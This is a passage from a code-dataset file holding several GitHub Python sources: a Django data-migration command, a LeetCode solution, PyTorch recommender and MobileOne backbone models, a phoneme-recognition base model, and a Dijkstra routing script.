1000)\n\n show_time(get_clock_time())\n \n\n #If in clock mode update the display every second\n if mode == 0:\n display_time = running_time() - last_display_time\n if display_time >= 1000:\n last_display_time = display_time\n show_time(get_clock_time())\n\n sleep(100)\n","repo_name":"bbcmicrobit/micropython","sub_path":"examples/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":580,"dataset":"github-code","pt":"62"} +{"seq_id":"74277018437","text":"from django.core.management import BaseCommand\n\nfrom sme_terceirizadas.dados_comuns.models import LogSolicitacoesUsuario\nfrom sme_terceirizadas.produto.models import HomologacaoProduto, Produto, ProdutoEdital\n\n\nclass Command(BaseCommand):\n help = 'Cria objetos DataHoraVinculoProdutoEdital para todos os produtos'\n\n def handle(self, 
*args, **options):\n self.stdout.write(self.style.SUCCESS(f'Iniciando processo de criação dos dados'))\n produtos = Produto.objects.filter(vinculos__isnull=False).distinct()\n self.stdout.write(\n self.style.SUCCESS(f'Criando objetos DataHora de {produtos.count()} produtos simples...'))\n self.cria_datas_horas_dos_vinculos_do_produto(produtos)\n self.stdout.write(self.style.SUCCESS(f'DataHora de {produtos.count()} produtos simples finalizado.'))\n self.stdout.write(self.style.SUCCESS('Verificando quantidade de produtos complexos...'))\n hom_produtos_complexos_uuids = self.produtos_complexos()\n self.stdout.write(\n self.style.SUCCESS(f'Criando objetos DataHora de '\n f'{len(hom_produtos_complexos_uuids)} produtos complexos...'))\n self.lida_com_produtos_complexos(hom_produtos_complexos_uuids)\n self.stdout.write(self.style.SUCCESS(f'DataHora de {len(hom_produtos_complexos_uuids)} '\n f'produtos complexos finalizado.'))\n uuids_suspensos_editais = LogSolicitacoesUsuario.objects.filter(\n status_evento=LogSolicitacoesUsuario.SUSPENSO_EM_ALGUNS_EDITAIS).values_list('uuid_original', flat=True)\n self.stdout.write(\n self.style.SUCCESS(f'Criando objetos DataHora de '\n f'{len(uuids_suspensos_editais)} produtos com log de editais suspensos...'))\n self.lida_com_log_editais_suspensos(uuids_suspensos_editais)\n self.stdout.write(self.style.SUCCESS(f'DataHora de {len(uuids_suspensos_editais)} produtos finalizado.'))\n self.stdout.write(self.style.SUCCESS(f'Finalizando processo de migracao de dados'))\n\n def cria_datas_horas_dos_vinculos_do_produto(self, produtos):\n for index, produto in enumerate(produtos):\n for produto_edital in produto.vinculos.all():\n data_hora = produto_edital.criar_data_hora_vinculo()\n data_hora.criado_em = produto_edital.criado_em\n data_hora.save()\n if produto_edital.edital.numero == 'Edital de Pregão n°78/SME/2016':\n data_hora.criado_em = produto_edital.produto.data_homologacao\n data_hora.save()\n if index % 100 == 0 and index:\n self.stdout.write(\n self.style.SUCCESS(f'Já foram {index}...'))\n\n def produtos_complexos(self):\n produtos = Produto.objects.filter(vinculos__isnull=False).distinct()\n prods_log_editais = []\n for produto in produtos:\n hom = produto.homologacao\n for log in hom.logs.all():\n if ('suspen' in log.get_status_evento_display() or\n 'não homol' in log.get_status_evento_display() or\n 'autorizou reclamação' in log.get_status_evento_display()):\n prods_log_editais.append(hom.uuid)\n continue\n return prods_log_editais\n\n def lida_com_produtos_complexos(self, hom_produtos_complexos_uuids):\n hom_produtos = HomologacaoProduto.objects.filter(uuid__in=hom_produtos_complexos_uuids)\n for hom_produto in hom_produtos:\n for log in hom_produto.logs.all():\n if log.status_evento in [\n LogSolicitacoesUsuario.CODAE_AUTORIZOU_RECLAMACAO,\n LogSolicitacoesUsuario.CODAE_NAO_HOMOLOGADO,\n LogSolicitacoesUsuario.CODAE_AUTORIZOU_RECLAMACAO,\n LogSolicitacoesUsuario.CODAE_SUSPENDEU\n ]:\n for produto_edital in hom_produto.produto.vinculos.all():\n data_hora_vinculo = produto_edital.criar_data_hora_vinculo(suspenso=True)\n data_hora_vinculo.criado_em = log.criado_em\n data_hora_vinculo.save()\n\n def lida_com_log_editais_suspensos(self, uuids_suspensos_editais):\n hom_produtos = HomologacaoProduto.objects.filter(uuid__in=uuids_suspensos_editais)\n for hom_produto in hom_produtos:\n for log in hom_produto.logs.all():\n if log.get_status_evento_display() == 'Suspenso em alguns editais':\n editais = log.justificativa.split('
\n\nEditais suspensos:\n\n
')[1][3:-4].split(', ')\n for edital in editais:\n produto_edital = ProdutoEdital.objects.get(produto=hom_produto.produto, edital__numero=edital)\n dh = produto_edital.criar_data_hora_vinculo(suspenso=True)\n dh.criado_em = log.criado_em\n dh.save()\n","repo_name":"prefeiturasp/SME-Terceirizadas","sub_path":"sme_terceirizadas/produto/management/commands/criar_datas_horas_produtos_editais.py","file_name":"criar_datas_horas_produtos_editais.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"pt","doc_type":"code","stars":7,"dataset":"github-code","pt":"62"} +{"seq_id":"28427598739","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:\n if left == right:\n return head\n st = None\n ed = None\n prev = None\n temp = head\n nxt = temp.next\n if not nxt:\n return head\n c = 1\n while c < right:\n if c < left:\n ed = temp\n temp = temp.next\n nxt = nxt.next\n else:\n if not st:\n st = temp\n temp.next = prev\n prev = temp\n temp = nxt\n nxt = nxt.next\n c += 1\n temp.next = prev\n st.next = nxt\n if ed:\n ed.next = temp\n else:\n return temp\n return head","repo_name":"specbug/competitive-programming","sub_path":"LeetCode/reverse-linked-list-ii.py","file_name":"reverse-linked-list-ii.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"31284763573","text":"import pytorch_lightning as pl\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchmetrics.functional as tmf\nfrom pytorch_lightning.callbacks import EarlyStopping\nfrom torch.utils.data import DataLoader\n\nfrom utils.tensors import split\nfrom vae.dataset import UserRatingsDataset\n\nDEFAULT_PATH = \"vae/vae.pt\"\n\n\ndef init_weights(m):\n if type(m) == nn.Linear:\n nn.init.xavier_normal_(m.weight)\n nn.init.normal_(m.bias, std=0.01)\n\n\ndef elbo(x_hat, x, mu, logvar, anneal=1.0):\n bce = -torch.mean(torch.sum(F.log_softmax(x_hat, 1) * x, -1))\n kld = -5e-1 * torch.mean(torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), dim=1))\n\n return bce + anneal * kld\n\n\nclass Encoder(nn.Module):\n def __init__(self, input_size, output_size, layers=[1024, 512, 512, 256]):\n super(Encoder, self).__init__()\n self.deepNN = nn.Sequential()\n i = 0\n for layer in layers:\n self.deepNN.add_module(\n f\"ff{i}\", nn.Linear(input_size, layer, dtype=torch.float32)\n )\n self.deepNN.add_module(f\"activation{i}\", nn.Tanh())\n input_size = layer\n i += 1\n\n self.mu = nn.Linear(layer, output_size, dtype=torch.float32)\n self.sigma = nn.Linear(layer, output_size, dtype=torch.float32)\n\n def forward(self, inputs):\n tensor = self.deepNN(inputs)\n return self.mu(tensor), self.sigma(tensor)\n\n @property\n def trainable_parameters(self):\n total_params = sum(p.numel() for p in self.parameters())\n return total_params\n\n\nclass Decoder(nn.Module):\n def __init__(self, input_size, output_size, layers=[1024, 512, 512, 256]):\n super(Decoder, self).__init__()\n self.deepNN = nn.Sequential()\n\n i = 0\n for layer in layers:\n self.deepNN.add_module(\n f\"ff{i}\", nn.Linear(input_size, layer, dtype=torch.float32)\n )\n self.deepNN.add_module(f\"activation{i}\", nn.Tanh())\n input_size = layer\n i += 1\n\n self.deepNN.add_module(\n \"output\", nn.Linear(layer, output_size, dtype=torch.float32)\n )\n # 
self.deepNN.add_module(\"final_activation\", nn.Sigmoid())\n\n def forward(self, inputs):\n tensor = self.deepNN(inputs)\n return tensor\n\n @property\n def trainable_parameters(self):\n total_params = sum(p.numel() for p in self.parameters())\n return total_params\n\n\nclass Model(pl.LightningModule):\n def __init__(\n self,\n input_size,\n latent_size,\n encoder_layers=[600],\n decoder_layers=[600],\n ):\n super(Model, self).__init__()\n\n self.drop = nn.Dropout()\n self.encoder = Encoder(input_size, latent_size, encoder_layers)\n self.decoder = Decoder(latent_size, input_size, decoder_layers)\n\n self.apply(init_weights)\n\n def reparametrize(self, mu, logvar):\n sigma = torch.exp(0.5 * logvar)\n eps = torch.randn_like(mu)\n return eps.mul(sigma).add_(mu)\n\n def forward(self, x):\n x = x.to_dense()\n mu, _ = self.encoder(x)\n tensor = self.decoder(mu)\n return tensor\n\n def training_step(self, batch, batch_idx):\n batch = batch.to_dense()\n batch = self.drop(batch)\n mu, logvar = self.encoder(batch)\n tensor = self.reparametrize(mu, logvar)\n tensor = self.decoder(tensor)\n # TODO: implement annealing\n loss = elbo(tensor, batch, mu, logvar)\n return loss\n\n def validation_step(self, batch, batch_idx):\n batch = batch.to_dense()\n input, hold = split(batch)\n tensor = self.forward(input)\n tensor[input > 0] = 0.0\n # TODO: implement following validation metrics:\n # * recall and precision\n # * arhr and hr\n metrics = {}\n metrics[\"ndcg@100\"] = tmf.retrieval_normalized_dcg(tensor, hold, 100)\n metrics[\"hr@1\"] = tmf.retrieval_hit_rate(tensor, hold, 1)\n metrics[\"hr@10\"] = tmf.retrieval_hit_rate(tensor, hold, 10)\n self.log_dict(metrics, on_epoch=True, prog_bar=True)\n return metrics\n\n def test_step(self, batch, batch_idx):\n batch = batch.to_dense()\n input, hold = split(batch)\n tensor = self.forward(input)\n tensor[input > 0] = 0.0\n # TODO: implement following validation metrics:\n # * recall and precision\n # * arhr and hr\n metrics = {}\n metrics[\"ndcg@100\"] = tmf.retrieval_normalized_dcg(tensor, hold, 100)\n metrics[\"hr@1\"] = tmf.retrieval_hit_rate(tensor, hold, 1)\n metrics[\"hr@10\"] = tmf.retrieval_hit_rate(tensor, hold, 10)\n self.log_dict(metrics, on_epoch=True)\n return metrics\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters())\n return optimizer\n\n @property\n def trainable_parameters(self):\n total_params = sum(p.numel() for p in self.parameters())\n return total_params\n\n def save(self, path=DEFAULT_PATH):\n torch.save(self.state_dict(), path)\n\n def load(self, path=DEFAULT_PATH):\n self.load_state_dict(torch.load(path, map_location=self.device))\n\n\nif __name__ == \"__main__\":\n # data-loaders\n cutoff = lambda x: 1 if x >= 3.5 else 0 # function for generating implicit ratings\n\n dataset = UserRatingsDataset(\n \"data/ml-1m/ratings.csv\", threshold=20, rating_function=cutoff\n )\n train, valid, test = dataset.tvt_datasets()\n\n train = DataLoader(train, batch_size=100, num_workers=1)\n valid = DataLoader(valid, batch_size=100, num_workers=1)\n test = DataLoader(test, batch_size=100, num_workers=1)\n\n # model definition\n model = Model(dataset.n_items, 200)\n\n # traning\n trainer = pl.Trainer(\n max_epochs=200,\n log_every_n_steps=10,\n callbacks=[EarlyStopping(monitor=\"ndcg@100\", mode=\"max\", patience=20)],\n )\n trainer.fit(model, train, valid)\n trainer.test(model, 
test)\n","repo_name":"ratinac-nikola/deepRec","sub_path":"vae/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"17112129880","text":"import torch.nn as nn\nimport numpy as np\nimport torch\nimport copy\n\n# from torchvision.models import MobileNetV2\n\n'''\nCode from https://github.com/shoutOutYangJie/MobileOne/blob/main/mobileone.py\nWe using it since it has pretrained model\n\nthis also adopt by YOLOv7 as a detection backbone\n'''\n\n\ndef conv_bn(in_channels, out_channels, kernel_size, stride, padding, groups=1):\n result = nn.Sequential()\n result.add_module(\n \"conv\",\n nn.Conv2d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n groups=groups,\n bias=False,\n ),\n )\n result.add_module(\"bn\", nn.BatchNorm2d(num_features=out_channels))\n return result\n\n\nclass DepthWiseConv(nn.Module):\n def __init__(self, inc, kernel_size, stride=1):\n super().__init__()\n padding = 1\n if kernel_size == 1:\n padding = 0\n # self.conv = nn.Sequential(\n # nn.Conv2d(inc, inc, kernel_size, stride, padding, groups=inc, bias=False,),\n # nn.BatchNorm2d(inc),\n # )\n self.conv = conv_bn(inc, inc, kernel_size, stride, padding, inc)\n\n def forward(self, x):\n return self.conv(x)\n\n\nclass PointWiseConv(nn.Module):\n def __init__(self, inc, outc):\n super().__init__()\n # self.conv = nn.Sequential(\n # nn.Conv2d(inc, outc, 1, 1, 0, bias=False),\n # nn.BatchNorm2d(outc),\n # )\n self.conv = conv_bn(inc, outc, 1, 1, 0)\n\n def forward(self, x):\n return self.conv(x)\n\n\nclass MobileOneBlock(nn.Module):\n def __init__(\n self,\n in_channels,\n out_channels,\n k,\n stride=1,\n dilation=1,\n padding_mode=\"zeros\",\n deploy=False,\n use_se=False,\n ):\n super(MobileOneBlock, self).__init__()\n self.deploy = deploy\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.deploy = deploy\n kernel_size = 3\n padding = 1\n assert kernel_size == 3\n assert padding == 1\n self.k = k\n padding_11 = padding - kernel_size // 2\n\n self.nonlinearity = nn.ReLU()\n\n if use_se:\n # self.se = SEBlock(out_channels, internal_neurons=out_channels // 16)\n ...\n else:\n self.se = nn.Identity()\n\n if deploy:\n self.dw_reparam = nn.Conv2d(\n in_channels=in_channels,\n out_channels=in_channels,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n dilation=dilation,\n groups=in_channels,\n bias=True,\n padding_mode=padding_mode,\n )\n self.pw_reparam = nn.Conv2d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=1,\n stride=1,\n bias=True,\n )\n\n else:\n # self.rbr_identity = nn.BatchNorm2d(num_features=in_channels) if out_channels == in_channels and stride == 1 else None\n # self.rbr_dense = conv_bn(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, groups=groups)\n # self.rbr_1x1 = conv_bn(in_channels=in_channels, out_channels=out_channels, kernel_size=1, stride=stride, padding=padding_11, groups=groups)\n # print('RepVGG Block, identity = ', self.rbr_identity)\n self.dw_bn_layer = (\n nn.BatchNorm2d(in_channels)\n if out_channels == in_channels and stride == 1\n else None\n )\n for k_idx in range(k):\n setattr(\n self,\n f\"dw_3x3_{k_idx}\",\n DepthWiseConv(in_channels, 3, stride=stride),\n )\n self.dw_1x1 = DepthWiseConv(in_channels, 1, stride=stride)\n\n self.pw_bn_layer = (\n nn.BatchNorm2d(in_channels)\n if 
out_channels == in_channels and stride == 1\n else None\n )\n for k_idx in range(k):\n setattr(\n self, f\"pw_1x1_{k_idx}\", PointWiseConv(in_channels, out_channels)\n )\n\n def forward(self, inputs):\n if self.deploy:\n x = self.dw_reparam(inputs)\n x = self.nonlinearity(x)\n x = self.pw_reparam(x)\n x = self.nonlinearity(x)\n return x\n\n if self.dw_bn_layer is None:\n id_out = 0\n else:\n id_out = self.dw_bn_layer(inputs)\n\n x_conv_3x3 = []\n for k_idx in range(self.k):\n x = getattr(self, f\"dw_3x3_{k_idx}\")(inputs)\n # print(x.shape)\n x_conv_3x3.append(x)\n x_conv_1x1 = self.dw_1x1(inputs)\n # print(x_conv_1x1.shape, x_conv_3x3[0].shape)\n # print(x_conv_1x1.shape)\n # print(id_out)\n x = id_out + x_conv_1x1 + sum(x_conv_3x3)\n x = self.nonlinearity(self.se(x))\n\n # 1x1 conv\n if self.pw_bn_layer is None:\n id_out = 0\n else:\n id_out = self.pw_bn_layer(x)\n x_conv_1x1 = []\n for k_idx in range(self.k):\n x_conv_1x1.append(getattr(self, f\"pw_1x1_{k_idx}\")(x))\n x = id_out + sum(x_conv_1x1)\n x = self.nonlinearity(x)\n return x\n\n # Optional. This improves the accuracy and facilitates quantization.\n # 1. Cancel the original weight decay on rbr_dense.conv.weight and rbr_1x1.conv.weight.\n # 2. Use like this.\n # loss = criterion(....)\n # for every RepVGGBlock blk:\n # loss += weight_decay_coefficient * 0.5 * blk.get_cust_L2()\n # optimizer.zero_grad()\n # loss.backward()\n def get_custom_L2(self):\n # K3 = self.rbr_dense.conv.weight\n # K1 = self.rbr_1x1.conv.weight\n # t3 = (self.rbr_dense.bn.weight / ((self.rbr_dense.bn.running_var + self.rbr_dense.bn.eps).sqrt())).reshape(-1, 1, 1, 1).detach()\n # t1 = (self.rbr_1x1.bn.weight / ((self.rbr_1x1.bn.running_var + self.rbr_1x1.bn.eps).sqrt())).reshape(-1, 1, 1, 1).detach()\n\n # l2_loss_circle = (K3 ** 2).sum() - (K3[:, :, 1:2, 1:2] ** 2).sum() # The L2 loss of the \"circle\" of weights in 3x3 kernel. 
Use regular L2 on them.\n # eq_kernel = K3[:, :, 1:2, 1:2] * t3 + K1 * t1 # The equivalent resultant central point of 3x3 kernel.\n # l2_loss_eq_kernel = (eq_kernel ** 2 / (t3 ** 2 + t1 ** 2)).sum() # Normalize for an L2 coefficient comparable to regular L2.\n # return l2_loss_eq_kernel + l2_loss_circle\n ...\n\n # This func derives the equivalent kernel and bias in a DIFFERENTIABLE way.\n # You can get the equivalent kernel and bias at any time and do whatever you want,\n # for example, apply some penalties or constraints during training, just like you do to the other models.\n # May be useful for quantization or pruning.\n def get_equivalent_kernel_bias(self):\n # kernel3x3, bias3x3 = self._fuse_bn_tensor(self.rbr_dense)\n # kernel1x1, bias1x1 = self._fuse_bn_tensor(self.rbr_1x1)\n # kernelid, biasid = self._fuse_bn_tensor(self.rbr_identity)\n # return kernel3x3 + self._pad_1x1_to_3x3_tensor(kernel1x1) + kernelid, bias3x3 + bias1x1 + biasid\n\n dw_kernel_3x3 = []\n dw_bias_3x3 = []\n for k_idx in range(self.k):\n k3, b3 = self._fuse_bn_tensor(getattr(self, f\"dw_3x3_{k_idx}\").conv)\n # print(k3.shape, b3.shape)\n dw_kernel_3x3.append(k3)\n dw_bias_3x3.append(b3)\n dw_kernel_1x1, dw_bias_1x1 = self._fuse_bn_tensor(self.dw_1x1.conv)\n dw_kernel_id, dw_bias_id = self._fuse_bn_tensor(\n self.dw_bn_layer, self.in_channels\n )\n dw_kernel = (\n sum(dw_kernel_3x3)\n + self._pad_1x1_to_3x3_tensor(dw_kernel_1x1)\n + dw_kernel_id\n )\n dw_bias = sum(dw_bias_3x3) + dw_bias_1x1 + dw_bias_id\n # pw\n pw_kernel = []\n pw_bias = []\n for k_idx in range(self.k):\n k1, b1 = self._fuse_bn_tensor(getattr(self, f\"pw_1x1_{k_idx}\").conv)\n # print(k1.shape)\n pw_kernel.append(k1)\n pw_bias.append(b1)\n pw_kernel_id, pw_bias_id = self._fuse_bn_tensor(self.pw_bn_layer, 1)\n\n pw_kernel_1x1 = sum(pw_kernel) + pw_kernel_id\n pw_bias_1x1 = sum(pw_bias) + pw_bias_id\n return dw_kernel, dw_bias, pw_kernel_1x1, pw_bias_1x1\n\n def _pad_1x1_to_3x3_tensor(self, kernel1x1):\n if kernel1x1 is None:\n return 0\n else:\n return torch.nn.functional.pad(kernel1x1, [1, 1, 1, 1])\n\n def _fuse_bn_tensor(self, branch, groups=None):\n if branch is None:\n return 0, 0\n if isinstance(branch, nn.Sequential):\n kernel = branch.conv.weight\n bias = branch.conv.bias\n running_mean = branch.bn.running_mean\n running_var = branch.bn.running_var\n gamma = branch.bn.weight\n beta = branch.bn.bias\n eps = branch.bn.eps\n else:\n assert isinstance(branch, nn.BatchNorm2d)\n # if not hasattr(self, 'id_tensor'):\n input_dim = self.in_channels // groups # self.groups\n if groups == 1:\n ks = 1\n else:\n ks = 3\n kernel_value = np.zeros(\n (self.in_channels, input_dim, ks, ks), dtype=np.float32\n )\n for i in range(self.in_channels):\n if ks == 1:\n kernel_value[i, i % input_dim, 0, 0] = 1\n else:\n kernel_value[i, i % input_dim, 1, 1] = 1\n self.id_tensor = torch.from_numpy(kernel_value).to(branch.weight.device)\n\n kernel = self.id_tensor\n running_mean = branch.running_mean\n running_var = branch.running_var\n gamma = branch.weight\n beta = branch.bias\n eps = branch.eps\n std = (running_var + eps).sqrt()\n t = (gamma / std).reshape(-1, 1, 1, 1)\n return kernel * t, beta - running_mean * gamma / std\n\n def switch_to_deploy(self):\n dw_kernel, dw_bias, pw_kernel, pw_bias = self.get_equivalent_kernel_bias()\n\n self.dw_reparam = nn.Conv2d(\n in_channels=self.pw_1x1_0.conv.conv.in_channels,\n out_channels=self.pw_1x1_0.conv.conv.in_channels,\n kernel_size=self.dw_3x3_0.conv.conv.kernel_size,\n stride=self.dw_3x3_0.conv.conv.stride,\n 
padding=self.dw_3x3_0.conv.conv.padding,\n            groups=self.dw_3x3_0.conv.conv.in_channels,\n            bias=True,\n        )\n        self.pw_reparam = nn.Conv2d(\n            in_channels=self.pw_1x1_0.conv.conv.in_channels,\n            out_channels=self.pw_1x1_0.conv.conv.out_channels,\n            kernel_size=1,\n            stride=1,\n            bias=True,\n        )\n\n        self.dw_reparam.weight.data = dw_kernel\n        self.dw_reparam.bias.data = dw_bias\n        self.pw_reparam.weight.data = pw_kernel\n        self.pw_reparam.bias.data = pw_bias\n\n        for para in self.parameters():\n            para.detach_()\n        self.__delattr__(\"dw_1x1\")\n        for k_idx in range(self.k):\n            self.__delattr__(f\"dw_3x3_{k_idx}\")\n            self.__delattr__(f\"pw_1x1_{k_idx}\")\n        if hasattr(self, \"dw_bn_layer\"):\n            self.__delattr__(\"dw_bn_layer\")\n        if hasattr(self, \"pw_bn_layer\"):\n            self.__delattr__(\"pw_bn_layer\")\n        if hasattr(self, \"id_tensor\"):\n            self.__delattr__(\"id_tensor\")\n        self.deploy = True\n\n\nclass MobileOneNet(nn.Module):\n    def __init__(\n        self, blocks, ks, channels, strides, width_muls, num_classes=None, deploy=False\n    ):\n        super().__init__()\n\n        self.stage_num = len(blocks)\n        # self.stage0 = MobileOneBlock(3, int(channels[0] * width_muls[0]), ks[0], stride=strides[0], deploy=deploy)\n        self.stage0 = nn.Sequential(\n            nn.Conv2d(3, int(channels[0] * width_muls[0]), 3, 2, 1, bias=False),\n            nn.BatchNorm2d(int(channels[0] * width_muls[0])),\n            nn.ReLU(),\n        )\n        in_channels = int(channels[0] * width_muls[0])\n        for idx, block_num in enumerate(blocks[1:]):\n            idx += 1\n            module = []\n            out_channels = int(channels[idx] * width_muls[idx])\n            for b_idx in range(block_num):\n                stride = strides[idx] if b_idx == 0 else 1\n                block = MobileOneBlock(\n                    in_channels, out_channels, ks[idx], stride, deploy=deploy\n                )\n                in_channels = out_channels\n                module.append(block)\n            setattr(self, f\"stage{idx}\", nn.Sequential(*module))\n\n        if num_classes is not None:\n            self.avg_pool = nn.AdaptiveAvgPool2d(1)\n            self.fc1 = nn.Sequential(\n                nn.Linear(\n                    out_channels,\n                    num_classes,\n                ),\n            )\n\n    def forward(self, x):\n        # for s_idx in range(self.stage_num):\n        #     x = getattr(self, f'stage{s_idx}')(x)\n        x0 = self.stage0(x)\n        # print(x0[0,:,0,0])\n        # return x0\n        x1 = self.stage1(x0)\n        x2 = self.stage2(x1)\n        x3 = self.stage3(x2)\n        x4 = self.stage4(x3)\n        x5 = self.stage5(x4)\n        assert x5.shape[-1] == 7\n        x = self.avg_pool(x5)\n        x = torch.flatten(x, start_dim=1) # b, c\n        x = self.fc1(x)\n        return x\n\n\ndef make_mobileone_s0(deploy=False):\n    blocks = [1, 2, 8, 5, 5, 1]\n    strides = [2, 2, 2, 2, 1, 2]\n    ks = [4, 4, 4, 4, 4, 4] if deploy is False else [1, 1, 1, 1, 1, 1]\n    width_muls = [0.75, 0.75, 1, 1, 1, 2] # 261 M flops\n    channels = [64, 64, 128, 256, 256, 512, 512]\n    num_classes = 1000\n\n    model = MobileOneNet(blocks, ks, channels, strides, width_muls, num_classes, deploy)\n    return model\n\n\ndef repvgg_model_convert(model: torch.nn.Module, do_copy=True, input=None, output=None):\n    if do_copy:\n        model = copy.deepcopy(model)\n    for module in model.modules():\n        if hasattr(module, \"switch_to_deploy\"):\n            module.switch_to_deploy()\n    print(\"switch done. Checking....\")\n
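    # Verification step: rebuild the network in deploy mode (hard-coded to MobileOne-S0 here), load\n    # the fused weights, and compare its output on `input` against the reference `output` if given.\n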
Checking....\")\n deploy_model = make_mobileone_s0(deploy=True)\n deploy_model.eval()\n deploy_model.load_state_dict(model.state_dict())\n if input is not None:\n o = deploy_model(x)\n # print(o)\n # print(output)\n print((output - o).sum())\n # if save_path is not None:\n # torch.save(model.state_dict(), save_path)\n return deploy_model\n","repo_name":"lucasjinreal/nb","sub_path":"nb/torch/backbones/mobileone.py","file_name":"mobileone.py","file_ext":"py","file_size_in_byte":14813,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"62"} +{"seq_id":"26227103415","text":"import abc\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom data.data_utils import PHNS\nfrom settings.hparam import hparam as hp\nfrom data.data_loader import TrainVoiceDataset, TestVoiceDataset\n\n\nclass Model(nn.Module):\n \"\"\"\n Bsae Class to build SR model\n \"\"\"\n def __init__(self):\n super(Model, self).__init__()\n\n @staticmethod\n def data_loader(mode):\n if mode == 'train':\n dataset = TrainVoiceDataset()\n elif mode == 'test':\n dataset = TestVoiceDataset()\n else:\n raise NotImplementedError('%s mode is not implemented ! ' % mode)\n\n data_loader = DataLoader(dataset, batch_size=hp.train.batch_size,\n shuffle=(mode == 'train'), num_workers=hp.num_workers, drop_last=False)\n return data_loader\n\n @staticmethod\n def calc_output(net):\n ppgs = F.softmax(net / hp.train.t, dim=-1)\n _, preds_ppg = torch.max(net, dim=-1) # return arg_max\n return ppgs, preds_ppg\n\n @staticmethod\n def loss(mfcc, logits_ppg, y_ppg):\n is_target = torch.sign(torch.abs(torch.sum(mfcc, dim=-1))) # indicator: (N, T)\n # flatten\n logits_ppg = logits_ppg.view(-1, len(PHNS))\n y_ppg = y_ppg.view(-1)\n loss = F.cross_entropy(logits_ppg, y_ppg, reduce=False)\n loss = loss.view(is_target.size()[0], -1)\n loss *= is_target\n return torch.mean(loss)\n\n @staticmethod\n def accuracy(pred_ppg, y_ppg):\n target = torch.sign(torch.abs(y_ppg))\n target = target.data.cpu().numpy()\n num_hits = torch.eq(pred_ppg, y_ppg).data.cpu().numpy()\n num_hits = np.sum(num_hits * target)\n num_targets = np.sum(target)\n return float(num_hits / num_targets), num_hits, num_targets\n\n @staticmethod\n def topk_accuracy(logit, y, topk=3):\n \"\"\"\n calculate topk accuracy\n :param logit: shape (N, Time Steps, The Number of Phonemes)\n :param y: shape (N, Time Steps)\n :return: topk accuracy only\n \"\"\"\n _, topk_var = logit.topk(topk, dim=-1)\n topk_arr = topk_var.data.cpu().numpy()\n y_arr = y.data.cpu().numpy()\n\n target = torch.sign(torch.abs(y))\n target = target.data.cpu().numpy()\n cor = 0.\n numb = np.sum(target)\n\n for b in range(y_arr.shape[0]): # batch size\n for j, (pred, label) in enumerate(zip(topk_arr[b], y_arr[b])):\n if not target[b, j]:\n continue\n if label in pred:\n cor += 1\n return cor / numb, cor, numb\n\n @staticmethod\n def confusion_matrix(logit_ppg, y_ppg):\n \"\"\"\n calculate and get confusion matrix as numpy array\n :param pred_ppg: shape (N, Time Steps, The Number of Phonemes)\n :param y_ppg: shape(N, Time Steps)\n :return: numpy array (NP, NP)\n \"\"\"\n _, preds_ppg = torch.max(logit_ppg, dim=-1)\n pred_arr = preds_ppg.data.cpu().numpy()\n y_ppg = y_ppg.data.cpu().numpy()\n n = len(PHNS)\n confusion_matrix = np.zeros((n, n))\n for b in range(y_ppg.shape[0]): # batch size\n for pred, label in zip(pred_arr[b], y_ppg[b]):\n confusion_matrix[pred, label] += 1\n return 
confusion_matrix\n","repo_name":"AppleHolic/PytorchSR","sub_path":"models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"62"} +{"seq_id":"1355463114","text":"import xlrd\nfrom Agent.graph import GraphInput\nfrom Agent.problem import Problem\nfrom Dijkstra.dijkstra import Dijkstra\n\n\ndef build_solution_path(problem):\n\n start = problem.start\n goal = problem.goal\n result = []\n\n while goal != None and goal.get_city() != start.get_city():\n result.insert(0, goal)\n goal = goal.get_previous()\n\n result.insert(0, start)\n return result\n\n\n# Obtain nodes from graph excel sheet.\n# nodes = GraphInput().sheetImport(\"Agent/Graph.xlsx\") # Romania graph...\n\nnodes = GraphInput().sheetImport(\"Agent/PR_Graph.xlsx\") # Puerto Rico graph...\n\n# Creating graph dictionary to be bounded to its corresponding problem.\n# Note this collection is necessary for the Dijkstra's algorithm implementation.\ngraph = {}\n\nfor node in nodes:\n graph[node.get_city()] = node\n\n# Define start and end nodes for test.\n\n# Romania start and end nodes...\n# start_node = nodes[00] # Arad\n# goal_node = nodes[12] # Bucharest\n\n# Puerto Rico start and end nodes...\nstart_node = nodes[1] # Mayagüez\ngoal_node = nodes[10] # Caguas\n\n# Then we use those nodes to define the problem.\nproblem = Problem(start_node, goal_node, graph)\n\nsolver = Dijkstra()\nelapsed_time = solver.search(problem)\nroute = build_solution_path(problem)\n\nroute_time = 0\nfor i in range(0, len(route) - 1):\n # Define two nodes for calculating time between them.\n current_node = route[i]\n next_node = route[i + 1]\n\n # Find the adjacency between current and next.\n for edge in current_node.get_edges():\n if edge.get_destination().get_city() == next_node.get_city():\n route_time += edge.get_distance() / edge.get_speed_limit() + edge.get_traffic_delay()\n break\n\nprint(\"ROUTE TIME FOR DIJKSTRA: \", route_time)\nprint(\"ELAPSED TIME FOR DIJSKTRA: \", elapsed_time)\nprint(\"PATH CHOSEN BY DIJKSTRA: \", 